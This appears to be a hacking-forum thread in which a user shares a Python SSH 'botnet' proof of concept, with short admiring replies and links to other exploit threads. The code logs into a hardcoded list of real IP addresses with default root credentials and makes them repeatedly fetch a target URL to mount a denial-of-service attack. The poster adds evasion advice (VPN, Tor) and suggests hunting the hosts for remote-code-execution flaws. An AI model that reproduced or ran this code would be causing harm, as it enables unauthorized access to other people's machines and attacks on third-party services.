[PoC] Honeypot Botnet - Weaponizing Honeypots
by viceCoolMan - Wednesday January 1, 2025 at 06:01 PM
#1
Here's a simple SSH botnet made from honeypots.

Numerous honeypots are linked to the intranet, some intentionally designed for hacking. During my investigation into the cracked SSH credentials, I discovered that curl was enabled. By concatenating curl commands, I was able to amplify the DDOS capability. Please use a VPN or VPS while running this script.


Possible improvements:  Because the bots are honeypots, you can try running nuclei with the -t CVES/ option to look for web-based RCEs. This could allow you to use Tor to send commands instead of SSH.

import concurrent.futures import time from paramiko import SSHClient, AutoAddPolicy class botnet:     def __init__(self, url: str):       self.url = url       self.bots = ["172.105.7.122","208.83.238.82","174.138.9.176","139.162.118.148","45.33.22.76","143.42.63.163","139.144.26.91","139.144.26.14","139.144.26.231","143.42.229.125","143.42.229.113","139.180.206.8","194.68.44.161","139.144.26.71","143.42.229.133","45.79.141.174","143.42.229.124","143.42.229.140"]       self.threads = 5#len(self.bots)       self.requests = 10       self.active = []    def task(self, bot_ip):       try:          client = SSHClient()          client.set_missing_host_key_policy(AutoAddPolicy())          client.connect(bot_ip, username='root', password='root', timeout=10)          channel = client.invoke_shell()          channel.recv(1024)          channel.send('id')          output = channel.recv(1024)          if "root" in output.decode():             channel.close()             print(f"Connected to Bot {bot_ip}")             botnet_string = f"curl {self.url} ;"             #this improvement will concatinat the commands so we only have to sent 1 instead of 10 ssh requests for 10 packets             for cycle in range(1, self.requests):                botnet_string += botnet_string             stdin, stdout, stderr = client.exec_command(botnet_string)             client.close()          else:             pass          client.close()       except Exception as e:          #print(e)          #print(f"{bot_ip} Didn't connect")          pass    def machineGun(self):       with concurrent.futures.ThreadPoolExecutor(max_workers=self.threads) as executor:          futures = [executor.submit(self.task, x.strip()) for x in self.bots] def main():    t = botnet("https://www.google.com")    for _ in range(10):       t.machineGun() if __name__ == "__main__":    main()
Ban reason: Self-Ban | http://raiddfzn73ir6iyxlf7nwytnujiflddog...an-Appeals if you wish to be unbanned in the future. (Permanent)
Reply
#2
very good PoC, GLWS!
My telegram got banned! contact me via PM


xmpp (Jabber): 303@thesecure.biz
Reply
#3
That looks veryy good
Hidden Content
You must register or login to view this content.
Reply
#4
Wow!, good to learn.
Reply
#5
This is a Good topic . Nice share @viceCoolMan .  :pawskate:
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  new wordpress website takeover vuln (video + poc ) zinzeur 312 27,280 03-28-2026, 02:43 AM
Last Post: toshi99
  [POC] Google OAuth "MultiLogin" endpoint 0-day Farfallaiero 106 13,203 02-10-2026, 03:34 PM
Last Post: birhikayemvar
  Cool Remote Patching ETW/Amsi PoC pepeloco 6 2,094 02-08-2026, 07:58 AM
Last Post: zeroday99
  CVE-2025-40554 - SolarWinds Web Help Desk Auth Bypass & RCE PoC miyako 3 76 02-07-2026, 03:32 PM
Last Post: cysc
  POC CVE-2025-24071 caca28sapo1 15 807 02-07-2026, 08:53 AM
Last Post: hacker0123



 Users browsing this thread: 1 Guest(s)